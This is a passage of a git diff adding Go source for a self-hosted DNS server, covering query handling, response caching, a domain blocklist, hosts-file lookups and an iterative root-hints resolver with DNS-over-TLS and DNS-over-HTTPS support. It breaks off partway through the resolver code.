log.Printf("DNS server listening on %s (UDP+TCP)", cfg.ListenDNS) + if err := dnsServer.Start(); err != nil { + log.Fatalf("DNS server error: %v", err) + } + }() + + // Start API server + apiServer := api.NewAPIServer(cfg, store, dnsServer) + go func() { + log.Printf("API server listening on %s", cfg.ListenAPI) + if err := apiServer.Start(); err != nil { + log.Fatalf("API server error: %v", err) + } + }() + + log.Printf("autarch-dns v%s started", version) + + // Wait for shutdown signal + sig := make(chan os.Signal, 1) + signal.Notify(sig, syscall.SIGINT, syscall.SIGTERM) + <-sig + + log.Println("Shutting down...") + dnsServer.Stop() +} diff --git a/services/dns-server/server/dns.go b/services/dns-server/server/dns.go new file mode 100644 index 0000000..dbe1a05 --- /dev/null +++ b/services/dns-server/server/dns.go @@ -0,0 +1,656 @@ +package server + +import ( + "log" + "sort" + "strings" + "sync" + "sync/atomic" + "time" + + "github.com/darkhal/autarch-dns/config" + "github.com/miekg/dns" +) + +// Metrics holds query statistics. +type Metrics struct { + TotalQueries uint64 `json:"total_queries"` + CacheHits uint64 `json:"cache_hits"` + CacheMisses uint64 `json:"cache_misses"` + LocalAnswers uint64 `json:"local_answers"` + ResolvedQ uint64 `json:"resolved"` + BlockedQ uint64 `json:"blocked"` + FailedQ uint64 `json:"failed"` + StartTime string `json:"start_time"` +} + +// QueryLogEntry records a single DNS query. +type QueryLogEntry struct { + Timestamp string `json:"timestamp"` + Client string `json:"client"` + Name string `json:"name"` + Type string `json:"type"` + Rcode string `json:"rcode"` + Answers int `json:"answers"` + Latency string `json:"latency"` + Source string `json:"source"` // "local", "cache", "recursive", "blocked", "failed" +} + +// CacheEntry holds a cached DNS response. +type CacheEntry struct { + msg *dns.Msg + expiresAt time.Time +} + +// CacheInfo is an exportable view of a cache entry. +type CacheInfo struct { + Key string `json:"key"` + Name string `json:"name"` + Type string `json:"type"` + TTL int `json:"ttl_remaining"` + Answers int `json:"answers"` + ExpiresAt string `json:"expires_at"` +} + +// DomainCount tracks query frequency per domain. +type DomainCount struct { + Domain string `json:"domain"` + Count uint64 `json:"count"` +} + +// DNSServer is the main DNS server. +type DNSServer struct { + cfg *config.Config + store *ZoneStore + hosts *HostsStore + resolver *RecursiveResolver + metrics Metrics + cache map[string]*CacheEntry + cacheMu sync.RWMutex + udpServ *dns.Server + tcpServ *dns.Server + + // Query log — ring buffer + queryLog []QueryLogEntry + queryLogMu sync.RWMutex + queryLogMax int + + // Domain frequency tracking + domainCounts map[string]uint64 + domainCountsMu sync.RWMutex + + // Query type tracking + typeCounts map[string]uint64 + typeCountsMu sync.RWMutex + + // Client tracking + clientCounts map[string]uint64 + clientCountsMu sync.RWMutex + + // Blocklist — fast lookup + blocklist map[string]bool + blocklistMu sync.RWMutex + + // Conditional forwarding: zone -> upstream servers + conditionalFwd map[string][]string + conditionalFwdMu sync.RWMutex +} + +// NewDNSServer creates a DNS server. +func NewDNSServer(cfg *config.Config, store *ZoneStore) *DNSServer { + resolver := NewRecursiveResolver() + resolver.EnableDoT = cfg.EnableDoT + resolver.EnableDoH = cfg.EnableDoH + + logMax := cfg.QueryLogMax + if logMax <= 0 { + logMax = 1000 + } + + s := &DNSServer{ + cfg: cfg, + store: store, + hosts: NewHostsStore(), + resolver: resolver, + cache: make(map[string]*CacheEntry), + queryLog: make([]QueryLogEntry, 0, logMax), + queryLogMax: logMax, + domainCounts: make(map[string]uint64), + typeCounts: make(map[string]uint64), + clientCounts: make(map[string]uint64), + blocklist: make(map[string]bool), + conditionalFwd: make(map[string][]string), + metrics: Metrics{ + StartTime: time.Now().UTC().Format(time.RFC3339), + }, + } + + // Load blocklist from config + for _, pattern := range cfg.BlockList { + s.blocklist[dns.Fqdn(strings.ToLower(pattern))] = true + } + + // Load hosts file if configured + if cfg.HostsFile != "" { + if err := s.hosts.LoadFile(cfg.HostsFile); err != nil { + log.Printf("[hosts] Warning: could not load hosts file %s: %v", cfg.HostsFile, err) + } + } + + return s +} + +// GetHosts returns the hosts store. +func (s *DNSServer) GetHosts() *HostsStore { + return s.hosts +} + +// GetEncryptionStatus returns encryption info from the resolver. +func (s *DNSServer) GetEncryptionStatus() map[string]interface{} { + return s.resolver.GetEncryptionStatus() +} + +// SetEncryption updates DoT/DoH settings on the resolver. +func (s *DNSServer) SetEncryption(dot, doh bool) { + s.resolver.EnableDoT = dot + s.resolver.EnableDoH = doh + s.cfg.EnableDoT = dot + s.cfg.EnableDoH = doh +} + +// GetResolver returns the underlying recursive resolver. +func (s *DNSServer) GetResolver() *RecursiveResolver { + return s.resolver +} + +// Start begins listening on UDP and TCP. +func (s *DNSServer) Start() error { + mux := dns.NewServeMux() + mux.HandleFunc(".", s.handleQuery) + + s.udpServ = &dns.Server{Addr: s.cfg.ListenDNS, Net: "udp", Handler: mux} + s.tcpServ = &dns.Server{Addr: s.cfg.ListenDNS, Net: "tcp", Handler: mux} + + errCh := make(chan error, 2) + go func() { errCh <- s.udpServ.ListenAndServe() }() + go func() { errCh <- s.tcpServ.ListenAndServe() }() + + go s.cacheCleanup() + + return <-errCh +} + +// Stop shuts down both servers. +func (s *DNSServer) Stop() { + if s.udpServ != nil { + s.udpServ.Shutdown() + } + if s.tcpServ != nil { + s.tcpServ.Shutdown() + } +} + +// GetMetrics returns current metrics. +func (s *DNSServer) GetMetrics() Metrics { + return Metrics{ + TotalQueries: atomic.LoadUint64(&s.metrics.TotalQueries), + CacheHits: atomic.LoadUint64(&s.metrics.CacheHits), + CacheMisses: atomic.LoadUint64(&s.metrics.CacheMisses), + LocalAnswers: atomic.LoadUint64(&s.metrics.LocalAnswers), + ResolvedQ: atomic.LoadUint64(&s.metrics.ResolvedQ), + BlockedQ: atomic.LoadUint64(&s.metrics.BlockedQ), + FailedQ: atomic.LoadUint64(&s.metrics.FailedQ), + StartTime: s.metrics.StartTime, + } +} + +// GetQueryLog returns the last N query log entries. +func (s *DNSServer) GetQueryLog(limit int) []QueryLogEntry { + s.queryLogMu.RLock() + defer s.queryLogMu.RUnlock() + + n := len(s.queryLog) + if limit <= 0 || limit > n { + limit = n + } + // Return most recent first + result := make([]QueryLogEntry, limit) + for i := 0; i < limit; i++ { + result[i] = s.queryLog[n-1-i] + } + return result +} + +// ClearQueryLog empties the log. +func (s *DNSServer) ClearQueryLog() { + s.queryLogMu.Lock() + s.queryLog = s.queryLog[:0] + s.queryLogMu.Unlock() +} + +// GetCacheEntries returns all cache entries. +func (s *DNSServer) GetCacheEntries() []CacheInfo { + s.cacheMu.RLock() + defer s.cacheMu.RUnlock() + + now := time.Now() + entries := make([]CacheInfo, 0, len(s.cache)) + for key, entry := range s.cache { + if now.After(entry.expiresAt) { + continue + } + parts := strings.SplitN(key, "/", 2) + name, qtype := key, "" + if len(parts) == 2 { + name, qtype = parts[0], parts[1] + } + entries = append(entries, CacheInfo{ + Key: key, + Name: name, + Type: qtype, + TTL: int(entry.expiresAt.Sub(now).Seconds()), + Answers: len(entry.msg.Answer), + ExpiresAt: entry.expiresAt.Format(time.RFC3339), + }) + } + return entries +} + +// CacheSize returns number of active cache entries. +func (s *DNSServer) CacheSize() int { + s.cacheMu.RLock() + defer s.cacheMu.RUnlock() + return len(s.cache) +} + +// FlushCache clears all cached responses. +func (s *DNSServer) FlushCache() int { + s.cacheMu.Lock() + n := len(s.cache) + s.cache = make(map[string]*CacheEntry) + s.cacheMu.Unlock() + // Also flush resolver NS cache + s.resolver.FlushNSCache() + return n +} + +// FlushCacheEntry removes a single cache entry. +func (s *DNSServer) FlushCacheEntry(key string) bool { + s.cacheMu.Lock() + defer s.cacheMu.Unlock() + if _, ok := s.cache[key]; ok { + delete(s.cache, key) + return true + } + return false +} + +// GetTopDomains returns the most-queried domains. +func (s *DNSServer) GetTopDomains(limit int) []DomainCount { + s.domainCountsMu.RLock() + defer s.domainCountsMu.RUnlock() + + counts := make([]DomainCount, 0, len(s.domainCounts)) + for domain, count := range s.domainCounts { + counts = append(counts, DomainCount{Domain: domain, Count: count}) + } + sort.Slice(counts, func(i, j int) bool { return counts[i].Count > counts[j].Count }) + if limit > 0 && limit < len(counts) { + counts = counts[:limit] + } + return counts +} + +// GetQueryTypeCounts returns counts by query type. +func (s *DNSServer) GetQueryTypeCounts() map[string]uint64 { + s.typeCountsMu.RLock() + defer s.typeCountsMu.RUnlock() + result := make(map[string]uint64, len(s.typeCounts)) + for k, v := range s.typeCounts { + result[k] = v + } + return result +} + +// GetClientCounts returns counts by client IP. +func (s *DNSServer) GetClientCounts() map[string]uint64 { + s.clientCountsMu.RLock() + defer s.clientCountsMu.RUnlock() + result := make(map[string]uint64, len(s.clientCounts)) + for k, v := range s.clientCounts { + result[k] = v + } + return result +} + +// AddBlocklistEntry adds a domain to the blocklist. +func (s *DNSServer) AddBlocklistEntry(domain string) { + s.blocklistMu.Lock() + s.blocklist[dns.Fqdn(strings.ToLower(domain))] = true + s.blocklistMu.Unlock() +} + +// RemoveBlocklistEntry removes a domain from the blocklist. +func (s *DNSServer) RemoveBlocklistEntry(domain string) { + s.blocklistMu.Lock() + delete(s.blocklist, dns.Fqdn(strings.ToLower(domain))) + s.blocklistMu.Unlock() +} + +// GetBlocklist returns all blocked domains. +func (s *DNSServer) GetBlocklist() []string { + s.blocklistMu.RLock() + defer s.blocklistMu.RUnlock() + list := make([]string, 0, len(s.blocklist)) + for domain := range s.blocklist { + list = append(list, domain) + } + sort.Strings(list) + return list +} + +// ImportBlocklist adds multiple domains at once. +func (s *DNSServer) ImportBlocklist(domains []string) int { + s.blocklistMu.Lock() + defer s.blocklistMu.Unlock() + count := 0 + for _, d := range domains { + d = strings.TrimSpace(strings.ToLower(d)) + if d == "" || strings.HasPrefix(d, "#") { + continue + } + s.blocklist[dns.Fqdn(d)] = true + count++ + } + return count +} + +// SetConditionalForward sets upstream servers for a specific zone. +func (s *DNSServer) SetConditionalForward(zone string, upstreams []string) { + s.conditionalFwdMu.Lock() + s.conditionalFwd[dns.Fqdn(strings.ToLower(zone))] = upstreams + s.conditionalFwdMu.Unlock() +} + +// RemoveConditionalForward removes conditional forwarding for a zone. +func (s *DNSServer) RemoveConditionalForward(zone string) { + s.conditionalFwdMu.Lock() + delete(s.conditionalFwd, dns.Fqdn(strings.ToLower(zone))) + s.conditionalFwdMu.Unlock() +} + +// GetConditionalForwards returns all conditional forwarding rules. +func (s *DNSServer) GetConditionalForwards() map[string][]string { + s.conditionalFwdMu.RLock() + defer s.conditionalFwdMu.RUnlock() + result := make(map[string][]string, len(s.conditionalFwd)) + for k, v := range s.conditionalFwd { + result[k] = v + } + return result +} + +// GetResolverNSCache returns the resolver's NS delegation cache. +func (s *DNSServer) GetResolverNSCache() map[string][]string { + return s.resolver.GetNSCache() +} + +func (s *DNSServer) handleQuery(w dns.ResponseWriter, r *dns.Msg) { + start := time.Now() + atomic.AddUint64(&s.metrics.TotalQueries, 1) + + msg := new(dns.Msg) + msg.SetReply(r) + msg.Authoritative = false + msg.RecursionAvailable = true + + if len(r.Question) == 0 { + msg.Rcode = dns.RcodeFormatError + w.WriteMsg(msg) + return + } + + q := r.Question[0] + qName := q.Name + qTypeStr := dns.TypeToString[q.Qtype] + clientAddr := w.RemoteAddr().String() + + // Track stats + s.trackDomain(qName) + s.trackType(qTypeStr) + s.trackClient(clientAddr) + + if s.cfg.LogQueries { + log.Printf("[query] %s %s from %s", qTypeStr, qName, clientAddr) + } + + // Security: Refuse ANY queries (DNS amplification protection) + if s.cfg.RefuseANY && q.Qtype == dns.TypeANY { + msg.Rcode = dns.RcodeNotImplemented + atomic.AddUint64(&s.metrics.FailedQ, 1) + s.logQuery(clientAddr, qName, qTypeStr, "NOTIMPL", 0, time.Since(start), "blocked") + w.WriteMsg(msg) + return + } + + // Security: Block zone transfer requests (AXFR/IXFR) + if q.Qtype == dns.TypeAXFR || q.Qtype == dns.TypeIXFR { + msg.Rcode = dns.RcodeRefused + atomic.AddUint64(&s.metrics.FailedQ, 1) + s.logQuery(clientAddr, qName, qTypeStr, "REFUSED", 0, time.Since(start), "blocked") + w.WriteMsg(msg) + return + } + + // Security: Minimal responses — don't expose server info + if s.cfg.MinimalResponses { + if q.Qtype == dns.TypeTXT && (qName == "version.bind." || qName == "hostname.bind." || qName == "version.server.") { + msg.Rcode = dns.RcodeRefused + s.logQuery(clientAddr, qName, qTypeStr, "REFUSED", 0, time.Since(start), "blocked") + w.WriteMsg(msg) + return + } + } + + // Blocklist check + if s.isBlocked(qName) { + msg.Rcode = dns.RcodeNameError // NXDOMAIN + atomic.AddUint64(&s.metrics.BlockedQ, 1) + s.logQuery(clientAddr, qName, qTypeStr, "NXDOMAIN", 0, time.Since(start), "blocked") + w.WriteMsg(msg) + return + } + + // 1a. Check hosts file + hostsAnswers := s.hosts.Lookup(qName, q.Qtype) + if len(hostsAnswers) > 0 { + msg.Authoritative = true + msg.Answer = hostsAnswers + atomic.AddUint64(&s.metrics.LocalAnswers, 1) + s.logQuery(clientAddr, qName, qTypeStr, "NOERROR", len(hostsAnswers), time.Since(start), "hosts") + w.WriteMsg(msg) + return + } + + // 1b. Check local zones + answers := s.store.Lookup(qName, q.Qtype) + if len(answers) > 0 { + msg.Authoritative = true + msg.Answer = answers + atomic.AddUint64(&s.metrics.LocalAnswers, 1) + s.logQuery(clientAddr, qName, qTypeStr, "NOERROR", len(answers), time.Since(start), "local") + w.WriteMsg(msg) + return + } + + // 2. Check cache + cacheKey := cacheKeyFor(q) + if cached := s.getCached(cacheKey); cached != nil { + cached.SetReply(r) + atomic.AddUint64(&s.metrics.CacheHits, 1) + s.logQuery(clientAddr, qName, qTypeStr, dns.RcodeToString[cached.Rcode], len(cached.Answer), time.Since(start), "cache") + w.WriteMsg(cached) + return + } + atomic.AddUint64(&s.metrics.CacheMisses, 1) + + // 3. Check conditional forwarding + if fwdServers := s.getConditionalForward(qName); fwdServers != nil { + c := &dns.Client{Timeout: 5 * time.Second} + for _, srv := range fwdServers { + resp, _, err := c.Exchange(r, srv) + if err == nil && resp != nil { + atomic.AddUint64(&s.metrics.ResolvedQ, 1) + s.putCache(cacheKey, resp) + resp.SetReply(r) + s.logQuery(clientAddr, qName, qTypeStr, dns.RcodeToString[resp.Rcode], len(resp.Answer), time.Since(start), "conditional") + w.WriteMsg(resp) + return + } + } + } + + // 4. Recursive resolution from root hints (with optional upstream fallback) + resp := s.resolver.ResolveWithFallback(r, s.cfg.Upstream) + if resp != nil { + atomic.AddUint64(&s.metrics.ResolvedQ, 1) + s.putCache(cacheKey, resp) + resp.SetReply(r) + s.logQuery(clientAddr, qName, qTypeStr, dns.RcodeToString[resp.Rcode], len(resp.Answer), time.Since(start), "recursive") + w.WriteMsg(resp) + return + } + + // 5. SERVFAIL + atomic.AddUint64(&s.metrics.FailedQ, 1) + msg.Rcode = dns.RcodeServerFailure + s.logQuery(clientAddr, qName, qTypeStr, "SERVFAIL", 0, time.Since(start), "failed") + w.WriteMsg(msg) +} + +// ── Blocklist ──────────────────────────────────────────────────────── + +func (s *DNSServer) isBlocked(name string) bool { + s.blocklistMu.RLock() + defer s.blocklistMu.RUnlock() + + fqdn := dns.Fqdn(strings.ToLower(name)) + // Exact match + if s.blocklist[fqdn] { + return true + } + // Wildcard: check parent domains + labels := dns.SplitDomainName(fqdn) + for i := 1; i < len(labels); i++ { + parent := dns.Fqdn(strings.Join(labels[i:], ".")) + if s.blocklist[parent] { + return true + } + } + return false +} + +// ── Conditional forwarding ─────────────────────────────────────────── + +func (s *DNSServer) getConditionalForward(name string) []string { + s.conditionalFwdMu.RLock() + defer s.conditionalFwdMu.RUnlock() + + fqdn := dns.Fqdn(strings.ToLower(name)) + labels := dns.SplitDomainName(fqdn) + for i := 0; i < len(labels); i++ { + zone := dns.Fqdn(strings.Join(labels[i:], ".")) + if servers, ok := s.conditionalFwd[zone]; ok { + return servers + } + } + return nil +} + +// ── Tracking ───────────────────────────────────────────────────────── + +func (s *DNSServer) trackDomain(name string) { + s.domainCountsMu.Lock() + s.domainCounts[name]++ + s.domainCountsMu.Unlock() +} + +func (s *DNSServer) trackType(qtype string) { + s.typeCountsMu.Lock() + s.typeCounts[qtype]++ + s.typeCountsMu.Unlock() +} + +func (s *DNSServer) trackClient(addr string) { + // Strip port + if idx := strings.LastIndex(addr, ":"); idx > 0 { + addr = addr[:idx] + } + s.clientCountsMu.Lock() + s.clientCounts[addr]++ + s.clientCountsMu.Unlock() +} + +func (s *DNSServer) logQuery(client, name, qtype, rcode string, answers int, latency time.Duration, source string) { + entry := QueryLogEntry{ + Timestamp: time.Now().UTC().Format(time.RFC3339Nano), + Client: client, + Name: name, + Type: qtype, + Rcode: rcode, + Answers: answers, + Latency: latency.String(), + Source: source, + } + + s.queryLogMu.Lock() + if len(s.queryLog) >= s.queryLogMax { + // Shift: remove oldest 10% + trim := s.queryLogMax / 10 + copy(s.queryLog, s.queryLog[trim:]) + s.queryLog = s.queryLog[:len(s.queryLog)-trim] + } + s.queryLog = append(s.queryLog, entry) + s.queryLogMu.Unlock() +} + +// ── Cache ──────────────────────────────────────────────────────────── + +func cacheKeyFor(q dns.Question) string { + return q.Name + "/" + dns.TypeToString[q.Qtype] +} + +func (s *DNSServer) getCached(key string) *dns.Msg { + s.cacheMu.RLock() + defer s.cacheMu.RUnlock() + entry, ok := s.cache[key] + if !ok || time.Now().After(entry.expiresAt) { + return nil + } + return entry.msg.Copy() +} + +func (s *DNSServer) putCache(key string, msg *dns.Msg) { + ttl := time.Duration(s.cfg.CacheTTL) * time.Second + if ttl <= 0 { + return + } + s.cacheMu.Lock() + s.cache[key] = &CacheEntry{msg: msg.Copy(), expiresAt: time.Now().Add(ttl)} + s.cacheMu.Unlock() +} + +func (s *DNSServer) cacheCleanup() { + ticker := time.NewTicker(60 * time.Second) + defer ticker.Stop() + for range ticker.C { + s.cacheMu.Lock() + now := time.Now() + for k, v := range s.cache { + if now.After(v.expiresAt) { + delete(s.cache, k) + } + } + s.cacheMu.Unlock() + } +} diff --git a/services/dns-server/server/hosts.go b/services/dns-server/server/hosts.go new file mode 100644 index 0000000..f0e80c7 --- /dev/null +++ b/services/dns-server/server/hosts.go @@ -0,0 +1,349 @@ +package server + +import ( + "bufio" + "fmt" + "log" + "net" + "os" + "strings" + "sync" + "time" + + "github.com/miekg/dns" +) + +// HostEntry represents a single hosts file entry. +type HostEntry struct { + IP string `json:"ip"` + Hostname string `json:"hostname"` + Aliases []string `json:"aliases,omitempty"` + Comment string `json:"comment,omitempty"` +} + +// HostsStore manages a hosts-file-like database. +type HostsStore struct { + mu sync.RWMutex + entries []HostEntry + path string // path to hosts file on disk (if loaded from file) +} + +// NewHostsStore creates a new hosts store. +func NewHostsStore() *HostsStore { + return &HostsStore{ + entries: make([]HostEntry, 0), + } +} + +// LoadFile parses a hosts file from disk. +func (h *HostsStore) LoadFile(path string) error { + f, err := os.Open(path) + if err != nil { + return err + } + defer f.Close() + + h.mu.Lock() + defer h.mu.Unlock() + + h.path = path + h.entries = h.entries[:0] + + scanner := bufio.NewScanner(f) + for scanner.Scan() { + line := strings.TrimSpace(scanner.Text()) + if line == "" || strings.HasPrefix(line, "#") { + continue + } + + // Strip inline comments + comment := "" + if idx := strings.Index(line, "#"); idx >= 0 { + comment = strings.TrimSpace(line[idx+1:]) + line = strings.TrimSpace(line[:idx]) + } + + fields := strings.Fields(line) + if len(fields) < 2 { + continue + } + + ip := fields[0] + if net.ParseIP(ip) == nil { + continue // invalid IP + } + + entry := HostEntry{ + IP: ip, + Hostname: strings.ToLower(fields[1]), + Comment: comment, + } + if len(fields) > 2 { + aliases := make([]string, len(fields)-2) + for i, a := range fields[2:] { + aliases[i] = strings.ToLower(a) + } + entry.Aliases = aliases + } + h.entries = append(h.entries, entry) + } + + log.Printf("[hosts] Loaded %d entries from %s", len(h.entries), path) + return scanner.Err() +} + +// LoadFromText parses hosts-format text (like pasting /etc/hosts content). +func (h *HostsStore) LoadFromText(content string) int { + h.mu.Lock() + defer h.mu.Unlock() + + count := 0 + scanner := bufio.NewScanner(strings.NewReader(content)) + for scanner.Scan() { + line := strings.TrimSpace(scanner.Text()) + if line == "" || strings.HasPrefix(line, "#") { + continue + } + + comment := "" + if idx := strings.Index(line, "#"); idx >= 0 { + comment = strings.TrimSpace(line[idx+1:]) + line = strings.TrimSpace(line[:idx]) + } + + fields := strings.Fields(line) + if len(fields) < 2 { + continue + } + + ip := fields[0] + if net.ParseIP(ip) == nil { + continue + } + + entry := HostEntry{ + IP: ip, + Hostname: strings.ToLower(fields[1]), + Comment: comment, + } + if len(fields) > 2 { + aliases := make([]string, len(fields)-2) + for i, a := range fields[2:] { + aliases[i] = strings.ToLower(a) + } + entry.Aliases = aliases + } + + // Dedup by hostname + found := false + for i, e := range h.entries { + if e.Hostname == entry.Hostname { + h.entries[i] = entry + found = true + break + } + } + if !found { + h.entries = append(h.entries, entry) + } + count++ + } + + return count +} + +// Add adds a single host entry. +func (h *HostsStore) Add(ip, hostname string, aliases []string, comment string) error { + if net.ParseIP(ip) == nil { + return fmt.Errorf("invalid IP: %s", ip) + } + hostname = strings.ToLower(strings.TrimSpace(hostname)) + if hostname == "" { + return fmt.Errorf("hostname required") + } + + h.mu.Lock() + defer h.mu.Unlock() + + // Check for duplicate + for i, e := range h.entries { + if e.Hostname == hostname { + h.entries[i].IP = ip + h.entries[i].Aliases = aliases + h.entries[i].Comment = comment + return nil + } + } + + h.entries = append(h.entries, HostEntry{ + IP: ip, + Hostname: hostname, + Aliases: aliases, + Comment: comment, + }) + return nil +} + +// Remove removes a host entry by hostname. +func (h *HostsStore) Remove(hostname string) bool { + hostname = strings.ToLower(strings.TrimSpace(hostname)) + h.mu.Lock() + defer h.mu.Unlock() + + for i, e := range h.entries { + if e.Hostname == hostname { + h.entries = append(h.entries[:i], h.entries[i+1:]...) + return true + } + } + return false +} + +// Clear removes all entries. +func (h *HostsStore) Clear() int { + h.mu.Lock() + defer h.mu.Unlock() + n := len(h.entries) + h.entries = h.entries[:0] + return n +} + +// List returns all entries. +func (h *HostsStore) List() []HostEntry { + h.mu.RLock() + defer h.mu.RUnlock() + result := make([]HostEntry, len(h.entries)) + copy(result, h.entries) + return result +} + +// Count returns the number of entries. +func (h *HostsStore) Count() int { + h.mu.RLock() + defer h.mu.RUnlock() + return len(h.entries) +} + +// Lookup resolves a hostname from the hosts store. +// Returns DNS RRs matching the query name and type. +func (h *HostsStore) Lookup(name string, qtype uint16) []dns.RR { + if qtype != dns.TypeA && qtype != dns.TypeAAAA && qtype != dns.TypePTR { + return nil + } + + h.mu.RLock() + defer h.mu.RUnlock() + + fqdn := dns.Fqdn(strings.ToLower(name)) + baseName := strings.TrimSuffix(fqdn, ".") + + // PTR lookup (reverse DNS) + if qtype == dns.TypePTR { + // Convert in-addr.arpa name to IP + ip := ptrToIP(fqdn) + if ip == "" { + return nil + } + for _, e := range h.entries { + if e.IP == ip { + rr := &dns.PTR{ + Hdr: dns.RR_Header{ + Name: fqdn, + Rrtype: dns.TypePTR, + Class: dns.ClassINET, + Ttl: 60, + }, + Ptr: dns.Fqdn(e.Hostname), + } + return []dns.RR{rr} + } + } + return nil + } + + // Forward lookup (A / AAAA) + var results []dns.RR + for _, e := range h.entries { + // Match hostname or aliases + match := strings.EqualFold(e.Hostname, baseName) || strings.EqualFold(dns.Fqdn(e.Hostname), fqdn) + if !match { + for _, a := range e.Aliases { + if strings.EqualFold(a, baseName) || strings.EqualFold(dns.Fqdn(a), fqdn) { + match = true + break + } + } + } + if !match { + continue + } + + ip := net.ParseIP(e.IP) + if ip == nil { + continue + } + + if qtype == dns.TypeA && ip.To4() != nil { + rr := &dns.A{ + Hdr: dns.RR_Header{ + Name: fqdn, + Rrtype: dns.TypeA, + Class: dns.ClassINET, + Ttl: 60, + }, + A: ip.To4(), + } + results = append(results, rr) + } else if qtype == dns.TypeAAAA && ip.To4() == nil { + rr := &dns.AAAA{ + Hdr: dns.RR_Header{ + Name: fqdn, + Rrtype: dns.TypeAAAA, + Class: dns.ClassINET, + Ttl: 60, + }, + AAAA: ip, + } + results = append(results, rr) + } + } + return results +} + +// Export returns hosts file format text. +func (h *HostsStore) Export() string { + h.mu.RLock() + defer h.mu.RUnlock() + + var sb strings.Builder + sb.WriteString("# AUTARCH DNS hosts file\n") + sb.WriteString(fmt.Sprintf("# Generated: %s\n", time.Now().UTC().Format(time.RFC3339))) + sb.WriteString("# Entries: " + fmt.Sprintf("%d", len(h.entries)) + "\n\n") + + for _, e := range h.entries { + line := e.IP + "\t" + e.Hostname + for _, a := range e.Aliases { + line += "\t" + a + } + if e.Comment != "" { + line += "\t# " + e.Comment + } + sb.WriteString(line + "\n") + } + return sb.String() +} + +// ptrToIP converts a PTR domain name (in-addr.arpa) to an IP string. +func ptrToIP(name string) string { + name = strings.TrimSuffix(strings.ToLower(name), ".") + if !strings.HasSuffix(name, ".in-addr.arpa") { + return "" + } + name = strings.TrimSuffix(name, ".in-addr.arpa") + parts := strings.Split(name, ".") + if len(parts) != 4 { + return "" + } + // Reverse the octets + return parts[3] + "." + parts[2] + "." + parts[1] + "." + parts[0] +} diff --git a/services/dns-server/server/resolver.go b/services/dns-server/server/resolver.go new file mode 100644 index 0000000..e31f2d7 --- /dev/null +++ b/services/dns-server/server/resolver.go @@ -0,0 +1,528 @@ +package server + +import ( + "bytes" + "crypto/tls" + "fmt" + "io" + "log" + "net/http" + "strings" + "sync" + "time" + + "github.com/miekg/dns" +) + +// Root nameserver IPs (IANA root hints). +// These are hardcoded — they almost never change. +var rootServers = []string{ + "198.41.0.4:53", // a.root-servers.net + "170.247.170.2:53", // b.root-servers.net + "192.33.4.12:53", // c.root-servers.net + "199.7.91.13:53", // d.root-servers.net + "192.203.230.10:53", // e.root-servers.net + "192.5.5.241:53", // f.root-servers.net + "192.112.36.4:53", // g.root-servers.net + "198.97.190.53:53", // h.root-servers.net + "192.36.148.17:53", // i.root-servers.net + "192.58.128.30:53", // j.root-servers.net + "193.0.14.129:53", // k.root-servers.net + "199.7.83.42:53", // l.root-servers.net + "202.12.27.33:53", // m.root-servers.net +} + +// Well-known DoH endpoints — when user configures these as upstream, +// we auto-detect and use DoH instead of plain DNS. +var knownDoHEndpoints = map[string]string{ + "8.8.8.8": "https://dns.google/dns-query", + "8.8.4.4": "https://dns.google/dns-query", + "1.1.1.1": "https://cloudflare-dns.com/dns-query", + "1.0.0.1": "https://cloudflare-dns.com/dns-query", + "9.9.9.9": "https://dns.quad9.net/dns-query", + "149.112.112.112": "https://dns.quad9.net/dns-query", + "208.67.222.222": "https://dns.opendns.com/dns-query", + "208.67.220.220": "https://dns.opendns.com/dns-query", + "94.140.14.14": "https://dns.adguard-dns.com/dns-query", + "94.140.15.15": "https://dns.adguard-dns.com/dns-query", +} + +// Well-known DoT servers — port 853 TLS. +var knownDoTServers = map[string]string{ + "8.8.8.8": "dns.google", + "8.8.4.4": "dns.google", + "1.1.1.1": "one.one.one.one", + "1.0.0.1": "one.one.one.one", + "9.9.9.9": "dns.quad9.net", + "149.112.112.112": "dns.quad9.net", + "208.67.222.222": "dns.opendns.com", + "208.67.220.220": "dns.opendns.com", + "94.140.14.14": "dns-unfiltered.adguard.com", + "94.140.15.15": "dns-unfiltered.adguard.com", +} + +// EncryptionMode determines how upstream queries are sent. +type EncryptionMode int + +const ( + ModePlain EncryptionMode = iota // Standard UDP/TCP DNS + ModeDoT // DNS-over-TLS (port 853) + ModeDoH // DNS-over-HTTPS (RFC 8484) +) + +// RecursiveResolver performs iterative DNS resolution from root hints. +type RecursiveResolver struct { + // NS cache: zone -> list of nameserver IPs + nsCache map[string][]string + nsCacheMu sync.RWMutex + + client *dns.Client + dotClient *dns.Client // TLS client for DoT + dohHTTP *http.Client + maxDepth int + timeout time.Duration + + // Encryption settings + EnableDoT bool + EnableDoH bool +} + +// NewRecursiveResolver creates a resolver with root hints. +func NewRecursiveResolver() *RecursiveResolver { + return &RecursiveResolver{ + nsCache: make(map[string][]string), + client: &dns.Client{Timeout: 4 * time.Second}, + dotClient: &dns.Client{ + Net: "tcp-tls", + Timeout: 5 * time.Second, + TLSConfig: &tls.Config{ + MinVersion: tls.VersionTLS12, + }, + }, + dohHTTP: &http.Client{ + Timeout: 5 * time.Second, + Transport: &http.Transport{ + TLSClientConfig: &tls.Config{ + MinVersion: tls.VersionTLS12, + }, + MaxIdleConns: 10, + IdleConnTimeout: 30 * time.Second, + DisableCompression: false, + ForceAttemptHTTP2: true, + }, + }, + maxDepth: 20, + timeout: 4 * time.Second, + } +} + +// Resolve performs full iterative resolution for the given query message. +// Returns the final authoritative response, or nil on failure. +func (rr *RecursiveResolver) Resolve(req *dns.Msg) *dns.Msg { + if len(req.Question) == 0 { + return nil + } + + q := req.Question[0] + return rr.resolve(q.Name, q.Qtype, 0) +} + +func (rr *RecursiveResolver) resolve(name string, qtype uint16, depth int) *dns.Msg { + if depth >= rr.maxDepth { + log.Printf("[resolver] max depth reached for %s", name) + return nil + } + + name = dns.Fqdn(name) + + // Find the best nameservers to start from. + // Walk up the name to find cached NS records, fall back to root. + nameservers := rr.findBestNS(name) + + // Iterative resolution: keep querying NS servers until we get an answer + for i := 0; i < rr.maxDepth; i++ { + resp := rr.queryServers(nameservers, name, qtype) + if resp == nil { + return nil + } + + // Got an authoritative answer or a final answer with records + if resp.Authoritative && len(resp.Answer) > 0 { + return resp + } + + // Check if answer section has what we want (non-authoritative but valid) + if len(resp.Answer) > 0 { + hasTarget := false + var cnameRR *dns.CNAME + for _, ans := range resp.Answer { + if ans.Header().Rrtype == qtype { + hasTarget = true + } + if cn, ok := ans.(*dns.CNAME); ok && qtype != dns.TypeCNAME { + cnameRR = cn + } + } + if hasTarget { + return resp + } + // Follow CNAME chain + if cnameRR != nil { + cResp := 